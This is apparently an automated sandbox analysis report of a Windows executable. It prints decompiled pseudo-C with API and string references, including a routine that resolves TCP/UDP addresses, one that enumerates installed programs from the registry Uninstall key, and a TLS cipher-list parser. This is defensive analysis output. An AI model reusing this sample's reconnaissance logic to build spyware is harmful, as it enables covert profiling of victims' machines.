                                                                                                0x0043ffaf
                                                                                                0x0043ffb5
                                                                                                0x0043ffb7
                                                                                                0x0043fff7
                                                                                                0x0043fffd
                                                                                                0x00440004
                                                                                                0x00440004
                                                                                                0x0044000a
                                                                                                0x0044000e
                                                                                                0x00000000
                                                                                                0x00440010
                                                                                                0x00440010
                                                                                                0x00440014
                                                                                                0x00440019
                                                                                                0x0044001d
                                                                                                0x00440022
                                                                                                0x00440029
                                                                                                0x00440037
                                                                                                0x0044003d
                                                                                                0x00440040
                                                                                                0x00440040
                                                                                                0x0044000e
                                                                                                0x0044004f
                                                                                                0x00440057
                                                                                                0x00440060
                                                                                                0x0043ffb9
                                                                                                0x0043ffbf
                                                                                                0x0043ffc2
                                                                                                0x0043ffc9
                                                                                                0x0043ffdb
                                                                                                0x0043ffe2
                                                                                                0x0043ffef
                                                                                                0x00000000
                                                                                                0x0043ffef
                                                                                                0x00000000
                                                                                                0x0043ffb7
                                                                                                0x0043fe10
                                                                                                0x0043fd8b
                                                                                                0x00000000
                                                                                                0x0043fd8b
                                                                                                0x00000000
                                                                                                0x0043fd89
                                                                                                0x0043fd82
                                                                                                0x0043fd84
                                                                                                0x0043fd84
                                                                                                0x00000000
                                                                                                0x0043fd0e
                                                                                                0x0043fd0e
                                                                                                0x0043fd10
                                                                                                0x0043fd20
                                                                                                0x0043fd20
                                                                                                0x00000000

                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                • _memcmp.LIBVCRUNTIME ref: 0043FF58
                                                                                                • _free.LIBCMT ref: 0043FFC9
                                                                                                • _free.LIBCMT ref: 0043FFE2
                                                                                                • _free.LIBCMT ref: 00440014
                                                                                                • _free.LIBCMT ref: 0044001D
                                                                                                • _free.LIBCMT ref: 00440029
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                • String ID: C
                                                                                                • API String ID: 1679612858-1037565863
                                                                                                • Opcode ID: 62246fbe2c6a4c795d1ad10a4e17c169d4a3493bfb010bf9b70b3d91c1d88982
                                                                                                • Instruction ID: 63a341f8b14465f0ea28c45dbb27bf6383284dc198ec993310377ceb7ae64faa
                                                                                                • Opcode Fuzzy Hash: 62246fbe2c6a4c795d1ad10a4e17c169d4a3493bfb010bf9b70b3d91c1d88982
                                                                                                • Instruction Fuzzy Hash: 51B14975E0121A9FDB24DF19C889AAEB7B4FF08304F5045AEE90AA7350D734AE94CF44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 43%
                                                                                                			E00411CE2(intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed short _v20;
                                                                                                				signed int _v24;
                                                                                                				signed short _v28;
                                                                                                				signed short _v32;
                                                                                                				char _v36;
                                                                                                				signed int _t76;
                                                                                                				signed int _t78;
                                                                                                				signed short _t87;
                                                                                                				signed int _t88;
                                                                                                				signed short _t91;
                                                                                                				signed short _t92;
                                                                                                				void* _t94;
                                                                                                				signed int _t103;
                                                                                                				signed char _t105;
                                                                                                				void* _t106;
                                                                                                				signed int _t113;
                                                                                                				signed short _t114;
                                                                                                				signed int _t116;
                                                                                                				signed int _t122;
                                                                                                				signed int* _t124;
                                                                                                				signed int _t125;
                                                                                                
                                                                                                				_t116 = _a8;
                                                                                                				_t105 = 0;
                                                                                                				_t103 = 0;
                                                                                                				_v12 = 0;
                                                                                                				_t125 = 0;
                                                                                                				_v24 = 0;
                                                                                                				_t124 = _a16;
                                                                                                				_v8 = 0;
                                                                                                				_v36 = 0;
                                                                                                				_v28 = 0;
                                                                                                				_v16 = 0;
                                                                                                				_v32 = 0;
                                                                                                				_v20 = 0;
                                                                                                				 *_t124 = 0;
                                                                                                				if(_a4 != 0 || _t116 != 0) {
                                                                                                					_t76 = _a12;
                                                                                                					__eflags = _t76;
                                                                                                					if(_t76 == 0) {
                                                                                                						L20:
                                                                                                						_a16 = _t103;
                                                                                                						__eflags = _t116;
                                                                                                						if(_t116 == 0) {
                                                                                                							L40:
                                                                                                							__eflags = _a4 - _t125;
                                                                                                							if(_a4 == _t125) {
                                                                                                								__eflags = _v12 & 0x00000001;
                                                                                                								_t106 = 0;
                                                                                                								_t78 =  !=  ? _t106 : 0x7f000001;
                                                                                                								__imp__#8(0x7f000001);
                                                                                                								L47:
                                                                                                								_a8 = _t78;
                                                                                                								_t79 = E00411A2B(_t103, _v24, __eflags, _v8, _t78);
                                                                                                								 *_t124 = _t79;
                                                                                                								__eflags = _t79;
                                                                                                								if(_t79 != 0) {
                                                                                                									__eflags = _a4 - _t125;
                                                                                                									if(_a4 == _t125) {
                                                                                                										L54:
                                                                                                										__eflags = _v16;
                                                                                                										if(_v16 == 0) {
                                                                                                											L57:
                                                                                                											return _t125;
                                                                                                										}
                                                                                                										_t125 = E00411C66(_v20,  *_t124);
                                                                                                										__eflags = _t125;
                                                                                                										if(_t125 == 0) {
                                                                                                											goto L57;
                                                                                                										}
                                                                                                										L56:
                                                                                                										E00411CA4(_t79,  *_t124);
                                                                                                										 *_t124 =  *_t124 & 0x00000000;
                                                                                                										__eflags =  *_t124;
                                                                                                										goto L57;
                                                                                                									}
                                                                                                									 *_t79 =  *_t79 | 0x00000004;
                                                                                                									__eflags = _v12 & 0x00000002;
                                                                                                									if((_v12 & 0x00000002) == 0) {
                                                                                                										goto L54;
                                                                                                									}
                                                                                                									__imp__#12(_a8);
                                                                                                									 *((intOrPtr*)( *_t124 + 0x14)) = E004119A0(_t79);
                                                                                                									_t79 =  *_t124;
                                                                                                									__eflags =  *((intOrPtr*)(_t79 + 0x14)) - _t125;
                                                                                                									if( *((intOrPtr*)(_t79 + 0x14)) != _t125) {
                                                                                                										goto L54;
                                                                                                									}
                                                                                                									_t125 = 8;
                                                                                                									L53:
                                                                                                									__eflags = _t125;
                                                                                                									if(_t125 != 0) {
                                                                                                										goto L56;
                                                                                                									}
                                                                                                									goto L54;
                                                                                                								}
                                                                                                								_t125 = 8;
                                                                                                								goto L56;
                                                                                                							}
                                                                                                							__eflags = E004119DD(_a4,  &_v36);
                                                                                                							if(__eflags != 0) {
                                                                                                								_t78 = _v36;
                                                                                                								goto L47;
                                                                                                							}
                                                                                                							_t79 = _v12;
                                                                                                							__eflags = _t79 & 0x00000004;
                                                                                                							if((_t79 & 0x00000004) == 0) {
                                                                                                								_t125 = _t79;
                                                                                                								goto L53;
                                                                                                							}
                                                                                                							_t125 = 0x2af9;
                                                                                                							goto L56;
                                                                                                						}
                                                                                                						_t113 = E00437B68(_t105, _t116,  &_v28, 0xa) & 0x0000ffff;
                                                                                                						_t87 = _v28;
                                                                                                						_v8 = _t113;
                                                                                                						__eflags =  *_t87;
                                                                                                						if( *_t87 != 0) {
                                                                                                							__eflags = _t103;
                                                                                                							if(_t103 == 0) {
                                                                                                								L26:
                                                                                                								__imp__#55(_a8, "udp");
                                                                                                								__eflags = _t87;
                                                                                                								if(_t87 != 0) {
                                                                                                									_t91 =  *(_t87 + 8) & 0x0000ffff;
                                                                                                									_v20 = _t91;
                                                                                                									_t87 = _t91 & 0x0000ffff;
                                                                                                									_v8 = _t87;
                                                                                                								}
                                                                                                								L28:
                                                                                                								__eflags = _t103;
                                                                                                								if(_t103 == 0) {
                                                                                                									L30:
                                                                                                									__imp__#55(_a8, "tcp");
                                                                                                									_t122 = 1;
                                                                                                									__eflags = _t87;
                                                                                                									if(_t87 == 0) {
                                                                                                										L32:
                                                                                                										_t114 = _v32;
                                                                                                										_t88 = _v8;
                                                                                                										L33:
                                                                                                										__eflags = _t88;
                                                                                                										if(_t88 != 0) {
                                                                                                											__eflags = _t103;
                                                                                                											if(_t103 != 0) {
                                                                                                												goto L40;
                                                                                                											}
                                                                                                											__eflags = _t114;
                                                                                                											_t103 = (_t103 & 0xffffff00 | _t114 == 0x00000000) + 1;
                                                                                                											__eflags = _t114;
                                                                                                											if(_t114 == 0) {
                                                                                                												L39:
                                                                                                												_t49 =  &_v16;
                                                                                                												 *_t49 = _v16 & _t125;
                                                                                                												__eflags =  *_t49;
                                                                                                												goto L40;
                                                                                                											}
                                                                                                											__eflags = _v20 - _t125;
                                                                                                											if(_v20 == _t125) {
                                                                                                												goto L39;
                                                                                                											}
                                                                                                											_v16 = _t122;
                                                                                                											goto L40;
                                                                                                										}
                                                                                                										__eflags = _t103;
                                                                                                										_t90 =  !=  ? 0x277d : 0x2af9;
                                                                                                										return  !=  ? 0x277d : 0x2af9;
                                                                                                									}
                                                                                                									_t114 =  *(_t87 + 8) & 0x0000ffff;
                                                                                                									_t88 = _t114 & 0x0000ffff;
                                                                                                									_v8 = _t88;
                                                                                                									goto L33;
                                                                                                								}
                                                                                                								_t122 = 1;
                                                                                                								__eflags = _t103 - 1;
                                                                                                								if(_t103 != 1) {
                                                                                                									goto L32;
                                                                                                								}
                                                                                                								goto L30;
                                                                                                							}
                                                                                                							__eflags = _t103 - 2;
                                                                                                							if(_t103 != 2) {
                                                                                                								goto L28;
                                                                                                							}
                                                                                                							goto L26;
                                                                                                						}
                                                                                                						__imp__#9(_t113);
                                                                                                						_t92 = _t87 & 0x0000ffff;
                                                                                                						__eflags = _t103;
                                                                                                						_v20 = _t92;
                                                                                                						_v8 = _t92 & 0x0000ffff;
                                                                                                						_t94 = 1;
                                                                                                						_t103 =  ==  ? _t94 : _t103;
                                                                                                						__eflags = _a16;
                                                                                                						_v16 = 0 | _a16 == 0x00000000;
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					__eflags =  *((intOrPtr*)(_t76 + 0x10)) - _t105;
                                                                                                					if( *((intOrPtr*)(_t76 + 0x10)) != _t105) {
                                                                                                						L23:
                                                                                                						return 0x2afb;
                                                                                                					}
                                                                                                					__eflags =  *((intOrPtr*)(_t76 + 0x14)) - _t105;
                                                                                                					if( *((intOrPtr*)(_t76 + 0x14)) != _t105) {
                                                                                                						goto L23;
                                                                                                					}
                                                                                                					__eflags =  *((intOrPtr*)(_t76 + 0x18)) - _t105;
                                                                                                					if( *((intOrPtr*)(_t76 + 0x18)) != _t105) {
                                                                                                						goto L23;
                                                                                                					}
                                                                                                					__eflags =  *((intOrPtr*)(_t76 + 0x1c)) - _t105;
                                                                                                					if( *((intOrPtr*)(_t76 + 0x1c)) != _t105) {
                                                                                                						goto L23;
                                                                                                					}
                                                                                                					_t105 =  *_t76;
                                                                                                					_v12 = _t105;
                                                                                                					__eflags = _t105 & 0x00000002;
                                                                                                					if((_t105 & 0x00000002) == 0) {
                                                                                                						L11:
                                                                                                						__eflags =  *((intOrPtr*)(_t76 + 4)) - _t103;
                                                                                                						if( *((intOrPtr*)(_t76 + 4)) == _t103) {
                                                                                                							L14:
                                                                                                							_t103 =  *(_t76 + 8);
                                                                                                							__eflags = _t103;
                                                                                                							if(_t103 == 0) {
                                                                                                								L19:
                                                                                                								_v24 =  *((intOrPtr*)(_t76 + 0xc));
                                                                                                								goto L20;
                                                                                                							}
                                                                                                							__eflags = _t103 - 1;
                                                                                                							if(_t103 == 1) {
                                                                                                								goto L19;
                                                                                                							}
                                                                                                							__eflags = _t103 - 2;
                                                                                                							if(_t103 == 2) {
                                                                                                								goto L19;
                                                                                                							}
                                                                                                							__eflags = _t103 - 3;
                                                                                                							if(_t103 == 3) {
                                                                                                								goto L19;
                                                                                                							}
                                                                                                							return 0x273c;
                                                                                                						}
                                                                                                						__eflags =  *((intOrPtr*)(_t76 + 4)) - 2;
                                                                                                						if( *((intOrPtr*)(_t76 + 4)) == 2) {
                                                                                                							goto L14;
                                                                                                						}
                                                                                                						return 0x273f;
                                                                                                					}
                                                                                                					__eflags = _a4 - _t103;
                                                                                                					if(_a4 != _t103) {
                                                                                                						goto L11;
                                                                                                					}
                                                                                                					return 0x2726;
                                                                                                				} else {
                                                                                                					return 0x2af9;
                                                                                                				}
                                                                                                			}



























                                                                                                0x00411e54
                                                                                                0x00411e54
                                                                                                0x00411e57
                                                                                                0x00411e5a
                                                                                                0x00411e5a
                                                                                                0x00411e5d
                                                                                                0x00411e73
                                                                                                0x00411e75
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411e77
                                                                                                0x00411e7d
                                                                                                0x00411e7e
                                                                                                0x00411e81
                                                                                                0x00411e8e
                                                                                                0x00411e8e
                                                                                                0x00411e8e
                                                                                                0x00411e8e
                                                                                                0x00000000
                                                                                                0x00411e8e
                                                                                                0x00411e83
                                                                                                0x00411e87
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411e89
                                                                                                0x00000000
                                                                                                0x00411e89
                                                                                                0x00411e5f
                                                                                                0x00411e6b
                                                                                                0x00000000
                                                                                                0x00411e6b
                                                                                                0x00411e48
                                                                                                0x00411e4c
                                                                                                0x00411e4f
                                                                                                0x00000000
                                                                                                0x00411e4f
                                                                                                0x00411e2e
                                                                                                0x00411e2f
                                                                                                0x00411e31
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411e31
                                                                                                0x00411e04
                                                                                                0x00411e07
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411e07
                                                                                                0x00411dcc
                                                                                                0x00411dd2
                                                                                                0x00411dd5
                                                                                                0x00411dd7
                                                                                                0x00411ddd
                                                                                                0x00411de2
                                                                                                0x00411de3
                                                                                                0x00411de8
                                                                                                0x00411dee
                                                                                                0x00000000
                                                                                                0x00411dee
                                                                                                0x00411d2b
                                                                                                0x00411d2e
                                                                                                0x00411df6
                                                                                                0x00000000
                                                                                                0x00411df6
                                                                                                0x00411d34
                                                                                                0x00411d37
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d3d
                                                                                                0x00411d40
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d46
                                                                                                0x00411d49
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d4f
                                                                                                0x00411d51
                                                                                                0x00411d54
                                                                                                0x00411d57
                                                                                                0x00411d68
                                                                                                0x00411d68
                                                                                                0x00411d6b
                                                                                                0x00411d7d
                                                                                                0x00411d7d
                                                                                                0x00411d80
                                                                                                0x00411d82
                                                                                                0x00411d9d
                                                                                                0x00411da0
                                                                                                0x00000000
                                                                                                0x00411da0
                                                                                                0x00411d84
                                                                                                0x00411d87
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d89
                                                                                                0x00411d8c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d8e
                                                                                                0x00411d91
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d93
                                                                                                0x00411d6d
                                                                                                0x00411d71
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d73
                                                                                                0x00411d59
                                                                                                0x00411d5c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d1a
                                                                                                0x00000000
                                                                                                0x00411d1a

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tcp$udp
                                                                                                • API String ID: 0-3725065008
                                                                                                • Opcode ID: e9e86f7bf4b6a832bbec402232646f3a132405df114319c8f84da0ea571296c6
                                                                                                • Instruction ID: 82daf4815be514220aeae679c2df1eb09617d7ec83e3698150b49ddb65605222
                                                                                                • Opcode Fuzzy Hash: e9e86f7bf4b6a832bbec402232646f3a132405df114319c8f84da0ea571296c6
                                                                                                • Instruction Fuzzy Hash: 95818A70A0030ADBDF248F95D5846FEB7B5AF44345F14806BEA05AB360E738DE81DB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 63%
                                                                                                			E004185F5(void* __ebx, void* __ecx) {
                                                                                                				void* _v8;
                                                                                                				void* _v12;
                                                                                                				char _v16;
                                                                                                				char _v40;
                                                                                                				char _v64;
                                                                                                				char _v88;
                                                                                                				char _v112;
                                                                                                				char _v136;
                                                                                                				char _v160;
                                                                                                				char _v184;
                                                                                                				char _v208;
                                                                                                				char _v232;
                                                                                                				char _v256;
                                                                                                				char _v280;
                                                                                                				char _v304;
                                                                                                				char _v328;
                                                                                                				char _v352;
                                                                                                				char _v376;
                                                                                                				char _v400;
                                                                                                				char _v424;
                                                                                                				char _v448;
                                                                                                				char _v472;
                                                                                                				char _v1500;
                                                                                                				void* __edi;
                                                                                                				long _t72;
                                                                                                				long _t78;
                                                                                                				long _t206;
                                                                                                				void* _t207;
                                                                                                				intOrPtr* _t208;
                                                                                                
                                                                                                				_t129 = __ebx;
                                                                                                				_t207 = __ecx;
                                                                                                				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
                                                                                                					_v16 = 0x400;
                                                                                                					_t206 = 0;
                                                                                                					E00401F5F(__ebx,  &_v64);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push( &_v16);
                                                                                                					_push( &_v1500);
                                                                                                					_push(0);
                                                                                                					while(1) {
                                                                                                						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
                                                                                                						__eflags = _t72 - 0x103;
                                                                                                						if(__eflags == 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						__eflags = _t72;
                                                                                                						if(_t72 != 0) {
                                                                                                							L8:
                                                                                                							_t206 = _t206 + 1;
                                                                                                							__eflags = _t206;
                                                                                                							_v16 = 0x400;
                                                                                                						} else {
                                                                                                							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
                                                                                                							__eflags = _t78;
                                                                                                							if(_t78 == 0) {
                                                                                                								E004109EE( &_v40, _v8, L"DisplayName");
                                                                                                								 *_t208 = L"Publisher";
                                                                                                								E004109EE( &_v184, _v8);
                                                                                                								 *_t208 = L"DisplayVersion";
                                                                                                								E004109EE( &_v160, _v8);
                                                                                                								 *_t208 = L"InstallLocation";
                                                                                                								E004109EE( &_v136, _v8);
                                                                                                								 *_t208 = L"InstallDate";
                                                                                                								E004109EE( &_v112, _v8);
                                                                                                								 *_t208 = L"UninstallString";
                                                                                                								E004109EE( &_v88, _v8);
                                                                                                								__eflags = E00409DEA();
                                                                                                								if(__eflags == 0) {
                                                                                                									E00403303(E00403098(_t129,  &_v208, E00403098(_t129,  &_v232, E0040440A(_t129,  &_v256, E00403098(_t129,  &_v280, E0040440A(_t129,  &_v304, E00403098(_t129,  &_v328, E0040440A(_t129,  &_v352, E00403098(_t129,  &_v376, E0040440A(_t129,  &_v400, E00403098(_t129,  &_v424, E0040440A(_t129,  &_v448, E00407677( &_v472,  &_v40, __eflags, 0x466afc), __eflags,  &_v160), _t206, __eflags, 0x466afc), __eflags,  &_v112), _t206, __eflags, 0x466afc), __eflags,  &_v184), _t206, __eflags, 0x466afc), __eflags,  &_v136), _t206, __eflags, 0x466afc), __eflags,  &_v88), _t206, __eflags, 0x466afc), _t206, __eflags, "\n"));
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                								}
                                                                                                								RegCloseKey(_v8);
                                                                                                								E00401EE2();
                                                                                                								E00401EE2();
                                                                                                								E00401EE2();
                                                                                                								E00401EE2();
                                                                                                								E00401EE2();
                                                                                                								E00401EE2();
                                                                                                								goto L8;
                                                                                                							}
                                                                                                						}
                                                                                                						__eflags = 0;
                                                                                                						_push(0);
                                                                                                						_push(0);
                                                                                                						_push(0);
                                                                                                						_push(0);
                                                                                                						_push( &_v16);
                                                                                                						_push( &_v1500);
                                                                                                						_push(_t206);
                                                                                                					}
                                                                                                					RegCloseKey(_v12);
                                                                                                					E0040330C(_t129, _t207, __eflags,  &_v64);
                                                                                                					E00401EE2();
                                                                                                				} else {
                                                                                                					E00404260(__ebx, _t207, 0x46079c);
                                                                                                				}
                                                                                                				return _t207;
                                                                                                			}

































                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00418617
                                                                                                • RegEnumKeyExA.ADVAPI32 ref: 004188CB
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004188DF
                                                                                                Strings
                                                                                                • DisplayName, xrefs: 0041868B
                                                                                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041860B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnumOpen
                                                                                                • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                • API String ID: 1332880857-3614651759
                                                                                                • Opcode ID: 004402a4a4c8776d7f5f40b03e4d90bfbe69429db1f8d137450362dc32d5c42a
                                                                                                • Instruction ID: 7a4ec65f64056a329eab026135af6b95974d318ca08f112ca2e0105190b16006
                                                                                                • Opcode Fuzzy Hash: 004402a4a4c8776d7f5f40b03e4d90bfbe69429db1f8d137450362dc32d5c42a
                                                                                                • Instruction Fuzzy Hash: 04811F719001199BDB14EF61DD92AEEB3B8EF50308F2041AFE50AB6191EF745F89CE58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 97%
                                                                                                			E0041C7EA(short* __edx) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				short* _v16;
                                                                                                				short _v20;
                                                                                                				char _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				char _v80;
                                                                                                				void* _t45;
                                                                                                				void* _t48;
                                                                                                				void* _t59;
                                                                                                				intOrPtr _t62;
                                                                                                				void* _t64;
                                                                                                				intOrPtr _t65;
                                                                                                				void* _t67;
                                                                                                				char _t68;
                                                                                                				char _t69;
                                                                                                				char* _t70;
                                                                                                				signed int _t71;
                                                                                                				short* _t72;
                                                                                                				signed int _t76;
                                                                                                				char* _t79;
                                                                                                				char* _t81;
                                                                                                				intOrPtr _t82;
                                                                                                				char* _t85;
                                                                                                				void* _t86;
                                                                                                				void* _t89;
                                                                                                				intOrPtr _t91;
                                                                                                				char* _t92;
                                                                                                				intOrPtr* _t93;
                                                                                                				void* _t95;
                                                                                                				void* _t96;
                                                                                                				void* _t97;
                                                                                                				void* _t98;
                                                                                                
                                                                                                				_v16 = __edx;
                                                                                                				_v8 = _v8 & 0;
                                                                                                				_v20 = 0;
                                                                                                				_v12 = 0;
                                                                                                				_v24 = 0;
                                                                                                				_v28 = E0040BADD();
                                                                                                				_t85 = "TLS_AES_128_GCM_SHA256";
                                                                                                				if(__edx == 0) {
                                                                                                					L37:
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t45 = E00437780(_t85, "ALL", 3);
                                                                                                				_t97 = _t96 + 0xc;
                                                                                                				if(_t45 == 0) {
                                                                                                					L36:
                                                                                                					return 1;
                                                                                                				}
                                                                                                				_t48 = E00437780(_t85, "DEFAULT", 7);
                                                                                                				_t98 = _t97 + 0xc;
                                                                                                				if(_t48 == 0) {
                                                                                                					goto L36;
                                                                                                				} else {
                                                                                                					goto L3;
                                                                                                				}
                                                                                                				do {
                                                                                                					L3:
                                                                                                					_t70 = _t85;
                                                                                                					_t86 = E00432660(_t85, 0x4668dc);
                                                                                                					if(_t86 != 0) {
                                                                                                						_t76 = _t86 - _t70;
                                                                                                						L8:
                                                                                                						if(_t76 <= 0x31) {
                                                                                                							if(_t86 != 0) {
                                                                                                								_t89 = _t86 - _t70;
                                                                                                								L15:
                                                                                                								E0043CFB0( &_v80, _t70, _t89);
                                                                                                								_t98 = _t98 + 0xc;
                                                                                                								_t11 = _t89 - 1; // -1
                                                                                                								_t90 =  ==  ? _t11 : _t89;
                                                                                                								_t71 = 0;
                                                                                                								 *((char*)(_t95 + ( ==  ? _t11 : _t89) - 0x4c)) = 0;
                                                                                                								if(_v28 <= 0) {
                                                                                                									L20:
                                                                                                									_t72 = _v16;
                                                                                                									_t91 = _v12;
                                                                                                									goto L21;
                                                                                                								}
                                                                                                								_t93 = 0x4618d0;
                                                                                                								while(1) {
                                                                                                									_t15 = _t93 - 4; // 0x466e70
                                                                                                									_t59 = E00437780( &_v80,  *_t15, 0x31);
                                                                                                									_t98 = _t98 + 0xc;
                                                                                                									if(_t59 == 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									_t67 = E00437780( &_v80,  *_t93, 0x31);
                                                                                                									_t98 = _t98 + 0xc;
                                                                                                									if(_t67 == 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									_t71 = _t71 + 1;
                                                                                                									_t93 = _t93 + 0xc;
                                                                                                									if(_t71 < _v28) {
                                                                                                										continue;
                                                                                                									}
                                                                                                									goto L20;
                                                                                                								}
                                                                                                								_t82 = _v20;
                                                                                                								if(_t82 >= 0x12b) {
                                                                                                									goto L37;
                                                                                                								}
                                                                                                								_t76 = _t71 * 0xc;
                                                                                                								_t72 = _v16;
                                                                                                								 *((char*)(_t72 + _t82 + 4)) =  *((intOrPtr*)(_t76 + 0x4618d4));
                                                                                                								 *((char*)(_t72 + _t82 + 5)) =  *((intOrPtr*)(_t76 + 0x4618d5));
                                                                                                								_t62 =  *((intOrPtr*)(_t76 + 0x4618d4));
                                                                                                								_v20 = _t82 + 2;
                                                                                                								if(_t62 == 0x13) {
                                                                                                									L34:
                                                                                                									_v8 = 1;
                                                                                                									L35:
                                                                                                									_t91 = 1;
                                                                                                									_v12 = 1;
                                                                                                									goto L21;
                                                                                                								}
                                                                                                								if(_t62 != 0xc0) {
                                                                                                									L30:
                                                                                                									if(_v8 != 0) {
                                                                                                										L32:
                                                                                                										if(_v24 == 0) {
                                                                                                											_v24 = 1;
                                                                                                										}
                                                                                                										goto L35;
                                                                                                									}
                                                                                                									_t64 = E00432660( &_v80, "ECDSA");
                                                                                                									_pop(_t76);
                                                                                                									if(_t64 != 0) {
                                                                                                										goto L34;
                                                                                                									}
                                                                                                									goto L32;
                                                                                                								}
                                                                                                								_t65 =  *((intOrPtr*)(_t76 + 0x4618d5));
                                                                                                								if(_t65 == 0xb4 || _t65 == 0xb5) {
                                                                                                									goto L34;
                                                                                                								} else {
                                                                                                									goto L30;
                                                                                                								}
                                                                                                							}
                                                                                                							_t92 = _t70;
                                                                                                							_t76 =  &(_t92[1]);
                                                                                                							do {
                                                                                                								_t68 =  *_t92;
                                                                                                								_t92 =  &(_t92[1]);
                                                                                                							} while (_t68 != 0);
                                                                                                							_t89 = _t92 - _t76;
                                                                                                							goto L15;
                                                                                                						}
                                                                                                						_t89 = 0x31;
                                                                                                						goto L15;
                                                                                                					}
                                                                                                					_t79 = _t70;
                                                                                                					_t81 =  &(_t79[1]);
                                                                                                					do {
                                                                                                						_t69 =  *_t79;
                                                                                                						_t79 =  &(_t79[1]);
                                                                                                					} while (_t69 != 0);
                                                                                                					_t76 = _t79 - _t81;
                                                                                                					goto L8;
                                                                                                					L21:
                                                                                                					_t85 = _t86 + 1;
                                                                                                				} while (_t86 != 0);
                                                                                                				if(_t91 != 0) {
                                                                                                					_push(_t76);
                                                                                                					 *_t72 = _v20;
                                                                                                					 *((char*)(_t72 + 0x154)) = 1;
                                                                                                					E00419D92(_t72, _v8, _v24, _t76, 1);
                                                                                                				}
                                                                                                				return _t91;
                                                                                                			}





































                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
